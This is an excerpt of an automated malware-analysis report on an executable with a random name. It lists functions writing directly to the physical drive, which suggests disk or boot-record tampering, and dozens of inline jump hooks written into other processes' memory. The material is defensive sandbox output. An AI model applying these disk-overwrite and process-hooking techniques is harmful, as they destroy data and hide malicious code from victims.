            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE021_2_00519EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE021_2_00519D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE022_2_00199EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE022_2_00199D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE023_2_00849EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE023_2_00849D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE025_2_00409EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE025_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE026_2_00829EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE026_2_00829D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE027_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE027_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE029_2_005D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE029_2_005D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE030_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE030_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE031_2_00919EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE031_2_00919D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE032_2_00399EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE032_2_00399D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE033_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE033_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE034_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE034_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE035_2_00159EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE035_2_00159D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE036_2_007F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE036_2_007F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE037_2_00259EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE037_2_00259D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE038_2_00269EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE038_2_00269D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE039_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE039_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE040_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE040_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE041_2_00289EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE041_2_00289D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE042_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE042_2_00109D90

            Hooking and other Techniques for Hiding and Protection

            barindex
            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 774CFA50 value: E9 3B 69 F0 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 774CFDA8 value: E9 93 68 F0 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 757158CD value: E9 2E B7 CB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 757182ED value: E9 AE 8D CB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 7576DF21 value: E9 EA 45 C6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 75709AE0 value: E9 8B 8A CC 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 756F5366 value: E9 55 BE CD 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 756F3EFC value: E9 8F D3 CD 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 69CBA9B0 value: E9 3B 6D 71 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 69CA572C value: E9 AF C0 72 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 769A6C19 value: E9 32 06 A3 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 769A4889 value: E9 82 D4 A2 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 76A91D20 value: E9 7B 03 94 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 76A0BF10 value: E9 4B 62 9C 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 76A81610 value: E9 8B 0D 95 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 774D0078 value: E9 53 53 F0 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2384 base: 774EEB2A value: E9 D1 67 EE 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 774CFA50 value: E9 3B 69 CB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 774CFDA8 value: E9 93 68 CB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 757158CD value: E9 2E B7 A6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 757182ED value: E9 AE 8D A6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 7576DF21 value: E9 EA 45 A1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 75709AE0 value: E9 8B 8A A7 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 756F5366 value: E9 55 BE A8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 756F3EFC value: E9 8F D3 A8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 69CBA9B0 value: E9 3B 6D 4C 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 69CA572C value: E9 AF C0 4D 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 769A6C19 value: E9 32 06 7E 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 769A4889 value: E9 82 D4 7D 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 76A91D20 value: E9 7B 03 6F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 76A0BF10 value: E9 4B 62 77 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 76A81610 value: E9 8B 0D 70 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 774D0078 value: E9 53 53 CB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1440 base: 774EEB2A value: E9 D1 67 C9 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 774CFA50 value: E9 3B 69 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 774CFDA8 value: E9 93 68 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 757158CD value: E9 2E B7 C6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 757182ED value: E9 AE 8D C6 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 7576DF21 value: E9 EA 45 C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 75709AE0 value: E9 8B 8A C7 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 756F5366 value: E9 55 BE C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 756F3EFC value: E9 8F D3 C8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 69CBA9B0 value: E9 3B 6D 6C 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 69CA572C value: E9 AF C0 6D 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 769A6C19 value: E9 32 06 9E 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 769A4889 value: E9 82 D4 9D 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 76A91D20 value: E9 7B 03 8F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 76A0BF10 value: E9 4B 62 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 76A81610 value: E9 8B 0D 90 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 774D0078 value: E9 53 53 EB 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2096 base: 774EEB2A value: E9 D1 67 E9 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774CFA50 value: E9 3B 69 F4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 774CFDA8 value: E9 93 68 F4 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 757158CD value: E9 2E B7 CF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 757182ED value: E9 AE 8D CF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 7576DF21 value: E9 EA 45 CA 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 75709AE0 value: E9 8B 8A D0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 756F5366 value: E9 55 BE D1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 756F3EFC value: E9 8F D3 D1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 69CBA9B0 value: E9 3B 6D 75 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1804 base: 69CA572C value: E9 AF C0 76 96 Jump to behavior
